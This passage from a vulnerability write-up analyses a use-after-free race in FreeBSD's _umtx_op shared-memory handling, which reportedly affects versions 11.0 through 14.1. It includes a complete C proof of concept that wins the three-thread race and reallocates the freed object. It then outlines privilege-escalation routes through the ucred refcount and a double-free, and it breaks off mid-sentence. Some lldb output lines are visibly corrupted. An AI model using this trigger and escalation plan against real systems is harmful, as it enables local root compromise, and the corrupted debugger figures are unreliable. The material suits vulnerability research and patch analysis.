FreeBSD 11.0+ Kernel LPE: Userspace Mutexes (umtx) Use-After-Free Race Condition
chrisIntroduction
Since 11.0-RELEASE, the FreeBSD kernel contained a race condition vulnerability
in the _umtx_op
syscall leading to an exploitable use-after-free. It affects up
to and including the latest release at time of writing, 14.1-RELEASE.
This report discusses the vulnerability in depth and explores exploitation options, leading to one that results in gaining root privileges from any unprivileged user.
I had previously discovered the vulnerability last year sometime, but it's now been publicly discovered and patched by Synacktiv as of September, 2024. As I hadn't done anything with my research beforehand, I'll now share it here.
Vulnerability Overview
FreeBSD 11.0 introduced the _umtx_op
syscall for implementing userland
threading primitives. The syscall takes an "operation" argument that
describes the sub-command to perform. Sub-commands are provided for dealing
with mutexes, condition variables, semaphores and other objects one would
associate with threading.
One of the _umtx_op
sub-commands is UMTX_OP_SHM
. This sub-command is used
for managing process-wide shared memory handles: creating them, destroying
them and looking them up.
This UMTX_OP_SHM
sub-command suffers from a race condition when it comes to
destroying a shared memory handle and this is the crux of the vulnerability:
by racing the destruction of the same handle at the same time, it's possible
for the destruction logic to run twice. Racing this with a third thread can
result in a file descriptor with a dangling struct shmfd
pointer through
its f_data
field.
An in-depth discussion with full details can be found in the Vulnerability Details section.
Exploitation Options
By reallocating into the UAF hole and interacting with the file descriptor
obtained through the vulnerability, we are able to read and write to other
structures on the heap. To make use of this, we need to understand what other
data we could have reallocated into the hole and then look for interesting
ways to manipulate it through the relevant fileops
table: shm_ops
in this
case.
The struct shmfd
is allocated from the general purpose heap rather than a
dedicated zone, greatly increasing our options for reallocating into the hole.
Even with this fact, however, there does not seem to be an immediately
straight-forward option here.
A much simpler approach is to leverage the vulnerability to cause a
double-free in the kernel. Double-frees are not detected by the FreeBSD
kernel and by inducing this condition, we are able to free ourselves from
being limited to shm_ops
for interacting with the backing data: we are able
to alias two completely different objects instead.
Full details of how this works to our advantage are covered in Exploitation.
Vulnerability Details
The prototype for the _umtx_op
syscall can be found in
/usr/include/sys/umtx.h
:
int _umtx_op(void *obj, int op, u_long val, void *uaddr, void *uaddr2);
The entry point in kernel for this syscall is in sys/kern/kern_umtx.c
:
int
sys__umtx_op(struct thread *td, struct _umtx_op_args *uap)
{
static const struct umtx_copyops *umtx_ops;
umtx_ops = &umtx_native_ops;
#ifdef __LP64__
if ((uap->op & (UMTX_OP__32BIT | UMTX_OP__I386)) != 0) {
if ((uap->op & UMTX_OP__I386) != 0)
umtx_ops = &umtx_native_opsi386;
else
umtx_ops = &umtx_native_opsx32;
}
#elif !defined(__i386__)
/* We consider UMTX_OP__32BIT a nop on !i386 ILP32. */
if ((uap->op & UMTX_OP__I386) != 0)
umtx_ops = &umtx_native_opsi386;
#else
/* Likewise, UMTX_OP__I386 is a nop on i386. */
if ((uap->op & UMTX_OP__32BIT) != 0)
umtx_ops = &umtx_native_opsx32;
#endif
[1] return (kern__umtx_op(td, uap->obj, uap->op, uap->val, uap->uaddr1,
uap->uaddr2, umtx_ops));
}
Some accommodation for 32-bit processes running on a 64-bit kernel are made
here, but otherwise our interest follows to kern__umtx_op
[1].
static int
kern__umtx_op(struct thread *td, void *obj, int op, unsigned long val,
void *uaddr1, void *uaddr2, const struct umtx_copyops *ops)
{
struct _umtx_op_args uap = {
.obj = obj,
.op = op & ~UMTX_OP__FLAGS,
.val = val,
.uaddr1 = uaddr1,
.uaddr2 = uaddr2
};
if ((uap.op >= nitems(op_table)))
return (EINVAL);
[2] return ((*op_table[uap.op])(td, &uap, ops));
}
This function very simply prepares an argument structure and calls off into a
function pointer from the op_table
table [2]. Looking at this table, we can
see a full list of all of the supported operations:
static const _umtx_op_func op_table[] = {
#ifdef COMPAT_FREEBSD10
[UMTX_OP_LOCK] = __umtx_op_lock_umtx,
[UMTX_OP_UNLOCK] = __umtx_op_unlock_umtx,
#else
[UMTX_OP_LOCK] = __umtx_op_unimpl,
[UMTX_OP_UNLOCK] = __umtx_op_unimpl,
#endif
[UMTX_OP_WAIT] = __umtx_op_wait,
[UMTX_OP_WAKE] = __umtx_op_wake,
[UMTX_OP_MUTEX_TRYLOCK] = __umtx_op_trylock_umutex,
[UMTX_OP_MUTEX_LOCK] = __umtx_op_lock_umutex,
[UMTX_OP_MUTEX_UNLOCK] = __umtx_op_unlock_umutex,
[UMTX_OP_SET_CEILING] = __umtx_op_set_ceiling,
[UMTX_OP_CV_WAIT] = __umtx_op_cv_wait,
[UMTX_OP_CV_SIGNAL] = __umtx_op_cv_signal,
[UMTX_OP_CV_BROADCAST] = __umtx_op_cv_broadcast,
[UMTX_OP_WAIT_UINT] = __umtx_op_wait_uint,
[UMTX_OP_RW_RDLOCK] = __umtx_op_rw_rdlock,
[UMTX_OP_RW_WRLOCK] = __umtx_op_rw_wrlock,
[UMTX_OP_RW_UNLOCK] = __umtx_op_rw_unlock,
[UMTX_OP_WAIT_UINT_PRIVATE] = __umtx_op_wait_uint_private,
[UMTX_OP_WAKE_PRIVATE] = __umtx_op_wake_private,
[UMTX_OP_MUTEX_WAIT] = __umtx_op_wait_umutex,
[UMTX_OP_MUTEX_WAKE] = __umtx_op_wake_umutex,
#if defined(COMPAT_FREEBSD9) || defined(COMPAT_FREEBSD10)
[UMTX_OP_SEM_WAIT] = __umtx_op_sem_wait,
[UMTX_OP_SEM_WAKE] = __umtx_op_sem_wake,
#else
[UMTX_OP_SEM_WAIT] = __umtx_op_unimpl,
[UMTX_OP_SEM_WAKE] = __umtx_op_unimpl,
#endif
[UMTX_OP_NWAKE_PRIVATE] = __umtx_op_nwake_private,
[UMTX_OP_MUTEX_WAKE2] = __umtx_op_wake2_umutex,
[UMTX_OP_SEM2_WAIT] = __umtx_op_sem2_wait,
[UMTX_OP_SEM2_WAKE] = __umtx_op_sem2_wake,
[3] [UMTX_OP_SHM] = __umtx_op_shm,
[UMTX_OP_ROBUST_LISTS] = __umtx_op_robust_lists,
[UMTX_OP_GET_MIN_TIMEOUT] = __umtx_op_get_min_timeout,
[UMTX_OP_SET_MIN_TIMEOUT] = __umtx_op_set_min_timeout,
};
This gives us a good idea of what the _umtx_op
syscall is really about. For
the purpose of this vulnerability, we're interested in the UMTX_OP_SHM
operation, which is implemented by __umtx_op_shm
[3].
UMTX_OP_SHM
__umtx_op_shm
extracts the two key parameters that came in from the
_umtx_op
syscall and passes them down to umtx_shm
:
static int
__umtx_op_shm(struct thread *td, struct _umtx_op_args *uap,
const struct umtx_copyops *ops __unused)
{
return (umtx_shm(td, uap->uaddr1, uap->val));
}
umtx_shm
is where the main logic lives:
static int
[1] umtx_shm(struct thread *td, void *addr, u_int flags)
{
struct umtx_key key;
struct umtx_shm_reg *reg;
struct file *fp;
int error, fd;
[2] if (__bitcount(flags & (UMTX_SHM_CREAT | UMTX_SHM_LOOKUP |
UMTX_SHM_DESTROY| UMTX_SHM_ALIVE)) != 1)
return (EINVAL);
if ((flags & UMTX_SHM_ALIVE) != 0)
return (umtx_shm_alive(td, addr));
[3] error = umtx_key_get(addr, TYPE_SHM, PROCESS_SHARE, &key);
if (error != 0)
return (error);
KASSERT(key.shared == 1, ("non-shared key"));
if ((flags & UMTX_SHM_CREAT) != 0) {
[4] error = umtx_shm_create_reg(td, &key, ®);
} else {
[5] reg = umtx_shm_find_reg(&key);
if (reg == NULL)
error = ESRCH;
}
umtx_key_release(&key);
if (error != 0)
return (error);
KASSERT(reg != NULL, ("no reg"));
if ((flags & UMTX_SHM_DESTROY) != 0) {
[6] umtx_shm_unref_reg(reg, true);
} else {
#if 0
#ifdef MAC
error = mac_posixshm_check_open(td->td_ucred,
reg->ushm_obj, FFLAGS(O_RDWR));
if (error == 0)
#endif
error = shm_access(reg->ushm_obj, td->td_ucred,
FFLAGS(O_RDWR));
if (error == 0)
#endif
[7] error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
if (error == 0) {
shm_hold(reg->ushm_obj);
[8] finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
&shm_ops);
td->td_retval[0] = fd;
fdrop(fp, td);
}
}
[9] umtx_shm_unref_reg(reg, false);
return (error);
}
This function isn't too long, but there are a few paths that we need to
understand here. At a high level and before diving into details, it's useful
to know that the whole purpose of this UMTX_SHM_OP
is to manage a registry
of shared memory regions: it lets us create new regions and look up or destroy
existing ones.
Beginning with the function signature [1], we see that our controlled inputs
to the function are pretty simple: void *addr
and u_int flags
.
umtx shared memory regions are identified/keyed by virtual addresses in our
process and that's what addr
is here. It doesn't matter what's stored at
addr
in our process — we just have to provide some memory address as
a key.
flags
is used to communicate what we want to do to the region mapped to that
addr
. It must be one of [2]:
UMTX_SHM_CREAT
: Create a new SHMUMTX_SHM_LOOKUP
: Look up an existing SHMUMTX_SHM_DESTROY
: Destroy an existing SHMUMTX_SHM_ALIVE
: Probe if an address maps to a SHM
We will ignore UMTX_SHM_ALIVE
here because it's largely uninteresting.
With flags
validated to just be one of these, the kernel then translates
addr
to a umtx_key
[3] and begins doing work based on what was asked.
For UMTX_SHM_CREAT
, the kernel uses umtx_shm_create_reg
to allocate a
fresh umtx_shm_reg
:
struct umtx_shm_reg {
TAILQ_ENTRY(umtx_shm_reg) ushm_reg_link;
LIST_ENTRY(umtx_shm_reg) ushm_obj_link;
struct umtx_key ushm_key;
struct ucred *ushm_cred;
struct shmfd *ushm_obj;
u_int ushm_refcnt;
u_int ushm_flags;
};
This is the structure that's part of the global linked list of shared memory regions. There are some important fields to pay particular attention to here:
ushm_refcnt
is a refcount for the entry.ushm_obj
is the actual shared memory object attached to the registry.
The ushm_obj
can live longer than its registry entry, so it has its own
refcount (->shm_refs
).
The umtx_shm_create_reg
function will create a new shmfd
with
->shm_refs == 1
and a new umtx_shm_reg
with ushm_refcnt == 2
. The
refcount is 2 because we have one reference in the registry list and one for
the caller.
If instead of UMTX_SHM_CREAT
the kernel is servicing a UMTX_SHM_LOOKUP
or
UMTX_SHM_DESTROY
action then an existing SHM needs to be resolved with
umtx_shm_find_reg
[5].
If that function succeeds in finding one, it takes a reference on
->ushm_refcnt
and returns it.
Either way, if no error occurred then the kernel will now have a
umtx_shm_reg
pointer and own one reference.
Continuing on in the code, if the requested action was UMTX_SHM_DESTROY
then umtx_shm_unref_reg
is called with its last argument as true
[6].
This function decrements the ->ushm_refcnt
and if the last argument is
true
then it also removes it from the registry.
Otherwise, for UMTX_SHM_CREAT
or UMTX_SHM_LOOKUP
, the kernel allocates a
new file descriptor [7] and attaches the struct shmfd
from the registry
entry to the file [8].
Since a pointer to the struct shmfd
is being stored on the file, a reference
on that object is taken with shm_hold
.
Finally we reach umtx_shm_unref_reg
for all 3 of these actions [9]: this
drops the refcount taken when it was looked up or created.
Refcounting and Locking
Referring back to the code in the previous subsection, it's interesting to
note that locking is only performed when creating or looking for a
umtx_shm_reg
.
For example, to look up an existing umtx_shm_reg
, the kernel uses
umtx_shm_find_reg
:
static struct umtx_shm_reg *
umtx_shm_find_reg(const struct umtx_key *key)
{
struct umtx_shm_reg *reg;
mtx_lock(&umtx_shm_lock);
reg = umtx_shm_find_reg_locked(key);
mtx_unlock(&umtx_shm_lock);
return (reg);
}
Similarly, when a reference is dropped on the umtx_shm_reg
, locking is done
internally:
static bool
umtx_shm_unref_reg_locked(struct umtx_shm_reg *reg, bool force)
{
bool res;
mtx_assert(&umtx_shm_lock, MA_OWNED);
KASSERT(reg->ushm_refcnt > 0, ("ushm_reg %p refcnt 0", reg));
reg->ushm_refcnt--;
res = reg->ushm_refcnt == 0;
if (res || force) {
if ((reg->ushm_flags & USHMF_REG_LINKED) != 0) {
TAILQ_REMOVE(&umtx_shm_registry[reg->ushm_key.hash],
reg, ushm_reg_link);
reg->ushm_flags &= ~USHMF_REG_LINKED;
}
if ((reg->ushm_flags & USHMF_OBJ_LINKED) != 0) {
LIST_REMOVE(reg, ushm_obj_link);
reg->ushm_flags &= ~USHMF_OBJ_LINKED;
}
}
return (res);
}
static void
umtx_shm_unref_reg(struct umtx_shm_reg *reg, bool force)
{
vm_object_t object;
bool dofree;
if (force) {
object = reg->ushm_obj->shm_object;
VM_OBJECT_WLOCK(object);
vm_object_set_flag(object, OBJ_UMTXDEAD);
VM_OBJECT_WUNLOCK(object);
}
mtx_lock(&umtx_shm_lock);
dofree = umtx_shm_unref_reg_locked(reg, force);
mtx_unlock(&umtx_shm_lock);
if (dofree)
umtx_shm_free_reg(reg);
}
This locking ensures that the reference counting is consistent amongst other
things, but it also fails to protect umtx_shm_find_reg
from finding a
umtx_shm_reg
that's in the process of being destroyed.
Consider what happens when UMTX_SHM_DESTROY
is serviced:
umtx_shm_reg
is found withumtx_shm_find_reg
(->ushm_refcnt++
)umtx_shm_unref_reg
called withforce == true
(->ushm_refcnt--
)umtx_shm_unref_reg
called withforce == false
(->ushm_refcnt--
)
The net effect of this operation is to decrease ushm_refcnt
by 1. Until
step 2 is completed, however, it's still possible to find the same
umtx_shm_reg
with umtx_shm_find_reg
.
Therefore, by racing two concurrent UMTX_SHM_DESTROY
actions for the same
addr
, it's possible to have a net effect of decreasing the ushm_refcnt
by 2 instead.
This is the core vulnerability.
Refcount Analysis
By considering two concurrent threads, Thread A and Thread B, both executing
a UMTX_SHM_DESTROY
for the same SHM, we can see how the refcount value
fluctuates.
We start with a simple umtx_shm_reg
in the registry. In this state,
->ushm_refcnt == 1
and ->ushm_obj->shm_refs == 1
.
We will use the numbered steps for our analysis:
umtx_shm_find_reg
=>->ushm_refcnt++
umtx_shm_unref_reg(..., true)
=>->ushm_refcnt--
umtx_shm_unref_reg(..., false)
=>->ushm_refcnt--
One possible scenario is:
- Thread A: Step 1 =>
->ushm_refcnt++
=>->ushm_refcnt == 2
- Thread B: Step 1 =>
->ushm_refcnt++
=>->ushm_refcnt == 3
- Thread A: Step 2 =>
->ushm_refcnt--
=>->ushm_refcnt == 2
- Thread B: Step 2 =>
->ushm_refcnt--
=>->ushm_refcnt == 1
- Thread A: Step 3 =>
->ushm_refcnt--
=>->ushm_refcnt == 0
=>umtx_shm_reg
FREED- As
umtx_shm_reg
is freed,shm_drop
is done on->ushm_obj
->ushm_obj->shm_refs--
=>->ushm_obj->shm_refs == 0
=>shmfd
FREED
- As
- Thread B: Step 3 =>
->ushm_refcnt--
=>->ushm_refcnt == -1
(on freed data)
There are only a couple of ways this race can play out because if either
thread hits Step 2 before the other hits Step 1, the ushm_mtx_reg
won't be
found. So this is really the only possible net effect of the race: the last
umtx_shm_unref_reg
operates on freed data.
Introducing a Third Thread
The discovery that the final umtx_shm_unref_reg
operates on freed data is
only mildly interesting on first glance. Surely to be of use we'd have to
race an allocation before that last call and have the decrement be meaningful?
Consider instead what happens if we introduce a third thread to this race —
but this time the thread is performing a UMTX_SHM_LOOKUP
:
- Thread A: Step 1 =>
->ushm_refcnt++
=>->ushm_refcnt == 2
- Thread B: Step 1 =>
->ushm_refcnt++
=>->ushm_refcnt == 3
- Thread C:
umtx_shm_find_reg
=>->ushm_refcnt++
=>->ushm_refcnt == 4
- Thread A: Step 2 =>
->ushm_refcnt--
=>->ushm_refcnt == 3
- Thread B: Step 2 =>
->ushm_refcnt--
=>->ushm_refcnt == 2
- Thread A: Step 3 =>
->ushm_refcnt--
=>->ushm_refcnt == 1
- Thread B: Step 3 =>
->ushm_refcnt--
=>->ushm_refcnt == 0
=>umtx_shm_reg
is FREED- As
umtx_shm_reg
is freed,shm_drop
is done on->ushm_obj
->ushm_obj->shm_refs--
=>->ushm_obj->shm_refs == 0
=>shmfd
FREED
- As
- Thread C:
- Allocate fd in process (
falloc_caps
) - shm_hold(reg->ushm_obj->shm_refs)
- Attach
reg->ushm_obj
(freed) to allocatedfile
(finit
) ->ushm_refcnt--
=>->ushm_refcnt == -1
- Allocate fd in process (
Now because Thread B reached Step 3 before Thread C could call shm_hold
,
Thread C has allocated a file
in the process with a dangling f_data
: it
points to the freed struct shmfd
.
It is of course possible for this race to turn out differently: Thread C could
call shm_hold
before Thread B hits Step 3, in which case f_data
will not
be dangling.
We can detect the right condition by inspecting the file we get back from Thread C. But before we even do that, we need to check that:
_umtx_op(UMTX_SHM_DESTROY)
in Thread A returned 0 (=> success)._umtx_op(UMTX_SHM_DESTROY)
in Thread B returned 0 (=> success)._umtx_op(UMTX_SHM_LOOKUP)
in Thread C returned >0 (=> success, file descriptor returned).
When all of these conditions are detected, we can then try to trigger a
controlled allocation into the correct kernel malloc
bucket and read some
value from our file descriptor to see if it contains a value we chose.
Looking at shmfd
, there are a few candidate fields:
struct shmfd {
vm_ooffset_t shm_size;
vm_object_t shm_object;
vm_pindex_t shm_pages; /* allocated pages */
int shm_refs;
uid_t shm_uid;
gid_t shm_gid;
mode_t shm_mode;
int shm_kmappings;
/*
* Values maintained solely to make this a better-behaved file
* descriptor for fstat() to run on.
*/
struct timespec shm_atime;
struct timespec shm_mtime;
struct timespec shm_ctime;
struct timespec shm_birthtime;
ino_t shm_ino;
struct label *shm_label; /* MAC label */
const char *shm_path;
struct rangelock shm_rl;
struct mtx shm_mtx;
int shm_flags;
int shm_seals;
/* largepage config */
int shm_lp_psind;
int shm_lp_alloc_policy;
};
Reading out of them requires using a function from the shm_ops
table:
struct fileops shm_ops = {
.fo_read = shm_read,
.fo_write = shm_write,
.fo_truncate = shm_truncate,
.fo_ioctl = shm_ioctl,
.fo_poll = invfo_poll,
.fo_kqfilter = invfo_kqfilter,
.fo_stat = shm_stat,
.fo_close = shm_close,
.fo_chmod = shm_chmod,
.fo_chown = shm_chown,
.fo_sendfile = vn_sendfile,
.fo_seek = shm_seek,
.fo_fill_kinfo = shm_fill_kinfo,
.fo_mmap = shm_mmap,
.fo_get_seals = shm_get_seals,
.fo_add_seals = shm_add_seals,
.fo_fallocate = shm_fallocate,
.fo_fspacectl = shm_fspacectl,
.fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
We do need to be careful, however: some of these functions will attempt to
interact with structures such as the struct rangelock
— and these are
expected to contain legitimate kernel pointers.
The shm_get_seals
function is one good candidate, which can be invoked
through fcntl(fd, F_GET_SEALS)
and simply returns the value of
->shm_seals
. It should be noted that this field isn't present on older
versions of FreeBSD, however.
One field that has existed since _umtx_op
was first introduced is
shm_mode
. This is the file permissions mode of the shmfd
and it's
initialised to O_RDWR
when a shmfd
is allocated by umtx_shm_create_reg
:
static int
umtx_shm_create_reg(struct thread *td, const struct umtx_key *key,
struct umtx_shm_reg **res)
{
struct umtx_shm_reg *reg, *reg1;
...
reg = uma_zalloc(umtx_shm_reg_zone, M_WAITOK | M_ZERO);
reg->ushm_refcnt = 1;
bcopy(key, ®->ushm_key, sizeof(*key));
reg->ushm_obj = shm_alloc(td->td_ucred, O_RDWR, false);
...
Attempting to fchmod
(via shm_chmod
) to the same mode will always succeed,
but if we've replaced the shm_mode
field with something like zeroes, this
will fail.
Therefore, once we've observed the desired return values from _umtx_op
across all 3 threads, our next steps should be:
- Try to force a kernel allocation of zeroes.
- Attempt to
fchmod(thread_c_result, O_RDWR)
.
If the fchmod
fails then we know that we've triggered the exact sequence of
thread execution that we need.
Strategy Proof-of-Concept
With a strategy in hand, we can now write a proof-of-concept that should trigger the vulnerability.
We will assume a modern version of FreeBSD and opt to read the shm_seals
field to detect a successful kernel allocation. For simplicity, we will use a
bogus ioctl(2)
call to attempt a controlled allocation into the correct
bucket.
The ioctl(2)
technique only gives a transient allocation — enough to place
data for a test — but we will use something more stable, such as
cap_ioctls_limit
when building a functioning exploit (discussed later).
The code for the strategy PoC is:
/*
* cc -pthread -o umtx-poc umtx-poc.c
*/
#define _WANT_FILE
#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/umtx.h>
#include <unistd.h>
static volatile int a_ready = 0;
static volatile int b_ready = 0;
static volatile int c_ready = 0;
static volatile int a_result = 0;
static volatile int b_result = 0;
static volatile int c_result = 0;
static void
pin_thread_to_cpu(int which)
{
cpuset_t cs;
CPU_ZERO(&cs);
CPU_SET(which, &cs);
if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, sizeof(cs), &cs))
err(1, "[%s] cpuset_setaffinity", __FUNCTION__);
}
static void *
thread_a(void *key)
{
pin_thread_to_cpu(1);
a_ready = 1;
while (!b_ready && !c_ready);
a_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
return NULL;
}
static void *
thread_b(void *key)
{
pin_thread_to_cpu(2);
b_ready = 1;
while (!a_ready && !c_ready);
b_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
return NULL;
}
static void *
thread_c(void *key)
{
pin_thread_to_cpu(0);
c_ready = 1;
while (!a_ready && !b_ready);
c_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);
return NULL;
}
int
main(int argc, char *argv[])
{
char key = 0;
pthread_t ta;
pthread_t tb;
pthread_t tc;
unsigned char aaaa_buffer[sizeof(struct shmfd)];
int seals;
int shmfd;
/* prepare the spray buffer. */
memset(aaaa_buffer, 0x41, sizeof(aaaa_buffer));
/* pin to same CPU as Thread C: */
pin_thread_to_cpu(0);
printf("[+] racing...\n");
for (;;) {
a_ready = 0;
b_ready = 0;
c_ready = 0;
a_result = 0;
b_result = 0;
c_result = 0;
/* create a SHM for the threads to find, but close the fd. */
if (-1 == (shmfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, &key, NULL)))
err(1, "[%s] _umtx_op", __FUNCTION__);
close(shmfd);
if (pthread_create(&ta, NULL, thread_a, &key) ||
pthread_create(&tb, NULL, thread_b, &key) ||
pthread_create(&tc, NULL, thread_c, &key))
errx(1, "[%s] pthread_create failed", __FUNCTION__);
if (pthread_join(ta, NULL) ||
pthread_join(tb, NULL) ||
pthread_join(tc, NULL))
errx(1, "[%s] pthread_join failed", __FUNCTION__);
if (!a_result && !b_result && c_result > 0) {
/* check if we now have a dangling shmfd in c_result: */
ioctl(-1, _IOW(0, 0, aaaa_buffer), aaaa_buffer);
if (0x41414141 == (seals = fcntl(c_result, F_GET_SEALS))) {
printf("[+] success! shm_seals: 0x%x\n", seals);
break;
}
}
close(c_result);
}
return 0;
}
This works as expected:
$ cc -pthread -o umtx-poc umtx-poc.c && ./umtx-poc
[+] racing...
[+] success! shm_seals: 0x41414141
Exploitation
Triggering the umtx vulnerability leaves us in a state where we have a
file descriptor to a file
that has a freed struct shmfd
hanging from its
f_data
pointer. As demonstrated at the end of the previous section, we can
trivially reallocate into this freed memory and observe the effects.
The shape of a struct shmfd
on the latest release at time of writing is:
struct shmfd {
vm_ooffset_t shm_size;
[1] vm_object_t shm_object;
vm_pindex_t shm_pages; /* allocated pages */
int shm_refs;
uid_t shm_uid;
gid_t shm_gid;
mode_t shm_mode;
int shm_kmappings;
/*
* Values maintained solely to make this a better-behaved file
* descriptor for fstat() to run on.
*/
struct timespec shm_atime;
struct timespec shm_mtime;
struct timespec shm_ctime;
struct timespec shm_birthtime;
ino_t shm_ino;
struct label *shm_label; /* MAC label */
[2] const char *shm_path;
struct rangelock shm_rl;
struct mtx shm_mtx;
int shm_flags;
int shm_seals;
/* largepage config */
int shm_lp_psind;
int shm_lp_alloc_policy;
};
This is an interesting structure to have control over. Some example fields that could be useful:
-
shm_object
: This will be a danglingvm_object_t
pointer. Reallocating thatvm_object_t
could provide a nice primitive: e.g. if we can have it reallocated as thevm_object_t
backing a file that we're only able to open forO_RDONLY
, the permissions we have on theshmfd
(inshm_mode
) may allow us tommap
the file asPROT_READ | PROT_WRITE
. Using this to gain write access to something like/etc/libmap.conf
would lead to a trivial privilege escalation. -
shm_path
: We can gain an arbitrary read through this pointer by controlling it and callingfcntl(fd, F_KINFO)
. That ends up reachingshm_fill_kinfo_locked
, which will do astrlcpy
from that address into a buffer to return to userland. Systematically increasing thatshm_path
then allows us to read onwards past'\0'
bytes.
Many of the ways we interact with this file descriptor will result in one of
the specialised fileops
functions being called. For this specific type of
file, the relevant fileops
table is shm_ops
:
struct fileops shm_ops = {
.fo_read = shm_read,
.fo_write = shm_write,
.fo_truncate = shm_truncate,
.fo_ioctl = shm_ioctl,
.fo_poll = invfo_poll,
.fo_kqfilter = invfo_kqfilter,
.fo_stat = shm_stat,
.fo_close = shm_close,
.fo_chmod = shm_chmod,
.fo_chown = shm_chown,
.fo_sendfile = vn_sendfile,
.fo_seek = shm_seek,
.fo_fill_kinfo = shm_fill_kinfo,
.fo_mmap = shm_mmap,
.fo_get_seals = shm_get_seals,
.fo_add_seals = shm_add_seals,
.fo_fallocate = shm_fallocate,
.fo_fspacectl = shm_fspacectl,
.fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
As noted in the previous section, many of these functions interact with the
struct shmfd
in a way that expects valid kernel pointers to exist. This
complicates things for targeting some of the shmfd
fields. For example,
many of the operations will try to acquire a range lock, interacting with
queues and pointers on both shm_rl
and shm_mtx
.
Kernel information disclosure vulnerabilities are not rare on FreeBSD, but it still feels sub-optimal to rely on further vulnerabilities to make good use of this bug.
Writing through shm_uid
/ shm_gid
One of the shm_ops
functions that avoids referencing pointers from the
shmfd
struct is shm_chown
:
static int
shm_chown(struct file *fp, uid_t uid, gid_t gid, struct ucred *active_cred,
struct thread *td)
{
struct shmfd *shmfd;
int error;
error = 0;
[1] shmfd = fp->f_data;
mtx_lock(&shm_timestamp_lock);
#ifdef MAC
error = mac_posixshm_check_setowner(active_cred, shmfd, uid, gid);
if (error != 0)
goto out;
#endif
[2] if (uid == (uid_t)-1)
uid = shmfd->shm_uid;
[3] if (gid == (gid_t)-1)
gid = shmfd->shm_gid;
if (((uid != shmfd->shm_uid && uid != active_cred->cr_uid) ||
[4] (gid != shmfd->shm_gid && !groupmember(gid, active_cred))) &&
(error = priv_check_cred(active_cred, PRIV_VFS_CHOWN)))
goto out;
[5] shmfd->shm_uid = uid;
[6] shmfd->shm_gid = gid;
out:
mtx_unlock(&shm_timestamp_lock);
return (error);
}
This function provides the implementation of fchown
for a shmfd
and is
fairly simple. First, the shmfd
pointer (pointer to the freed data we can
control) is taken at [1]. The uid
and gid
arguments to fchown
are
considered next: we can pass -1
as either of these to leave each value
unchanged, which is handled at [2] and [3].
Next is a permissions check. If we're attempting to change shm_uid
to
anything other than our current cr_uid
, or if we're trying to change
shm_gid
to a group to which we're not a member [4], then this will fail.
Otherwise the fields are written [5], [6].
Targeting shm_uid
and shm_gid
this way is potentially interesting:
whatever value happens to be in memory for those fields can be replaced with
our current uid
and gid
(or any gid
we're a member of).
We would have to find a useful struct to allocate into this memory that has a
useful field at the shm_uid
and shm_gid
offsets, of course.
Looking at the size of struct shmfd
, we can see that struct ucred
comes
from the same bucket — and ucred
s are astonishingly allocated from the
general purpose heap instead of a dedicated zone in FreeBSD:
user@freebsd:~ $ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (x86_64).
(lldb) p sizeof(struct shmfd)
(unsigned long) /bin/sh = 208
(lldb) p sizeof(struct ucred)
(unsigned long) = 256
shm_gid
happens to overlap the cr_ref
refcount field of ucred
:
(lldb) p &((struct shmfd *)0)->shm_gid
(gid_t *) = 0x0000000000000020
(lldb) p &((struct ucred *)0)->cr_ref
(u_int *) = 0x0000000000000020
This means that by allocating into the shmfd
hole with a ucred
, we can
change the refcount of that ucred
to whatever our gid
happens to be. By
changing the refcount to be lower than it should be, we can then trigger a
premature free of the ucred
and reallocate a new credential of our choosing
into that hole.
There are many ways to bump the refcount of a ucred
; a simple technique is
to make lots of threads. Each created thread will add to the refcount and
reaping will take from it.
While this strategy seems workable, it is somewhat brittle as it relies on these two structures always overlapping in a fruitful way. Rather than continue with this, I opted to focus on a different approach and instead turn the bug into a double-free. This provides us with a much richer exploitable state.
Expanding Options via Double-Free
The FreeBSD kernel does not detect double-frees. This is useful because if
we're able to turn our use-after-free into a double-free, it expands the set
of objects that we're able to alias: we would no longer be restricted to
considering what can be manipulated through shm_ops
, but instead through
whichever other types we're able to combine.
The FreeBSD kernel heap allocator works in a LIFO fashion. This still applies
for double-freed elements, too: if we free
the same virtual address twice
then the next two allocations from malloc
will return that same virtual
address. This behaviour lets us alias any two objects that come from the same
bucket.
In investigating how we might be able to free our dangling shmfd
again, it's
tempting to consider placing a fake shmfd
using a kernel reallocation
primitive (e.g ioctl
as we used in Strategy Proof-of-Concept) and
ensuring the shm_refs
field is set to 1.
Then, by calling close
on our file descriptor, we'll cause the kernel to
call shm_close
on our file, which simply does shm_drop
on our prepared
data:
void
shm_drop(struct shmfd *shmfd)
{
vm_object_t obj;
if (refcount_release(&shmfd->shm_refs)) {
#ifdef MAC
mac_posixshm_destroy(shmfd);
#endif
rangelock_destroy(&shmfd->shm_rl);
mtx_destroy(&shmfd->shm_mtx);
obj = shmfd->shm_object;
if (!shm_largepage(shmfd)) {
VM_OBJECT_WLOCK(obj);
obj->un_pager.swp.swp_priv = NULL;
VM_OBJECT_WUNLOCK(obj);
}
vm_object_deallocate(obj);
[1] free(shmfd, M_SHMFD);
}
}
We really just want to reach that free
at [1], but in order to get there,
the kernel will be interacting with various other fields such as shm_object
.
shm_object
is expected to be a legitimate kernel pointer and since it's
located before the shm_refs
field, we're obliged to provide a value if we
plan on placing a fake shmfd
.
It turns out that there's a different route we can take to triggering this
free
at [1].
Recall that the vulnerability gives as a file descriptor with a
dangling shmfd
pointer. If we now do another UMTX_SHM_CREAT
operation
then we will create a new umtx_shm_reg
and a new shmfd
:
umtx_shm_reg
has a refcount of 1shmfd
has a refcount of 2- Our dangling
shmfd
will point to the same address as this newshmfd
The shmfd
has a refcount of 2 because UMTX_SHM_CREAT
returns us a file
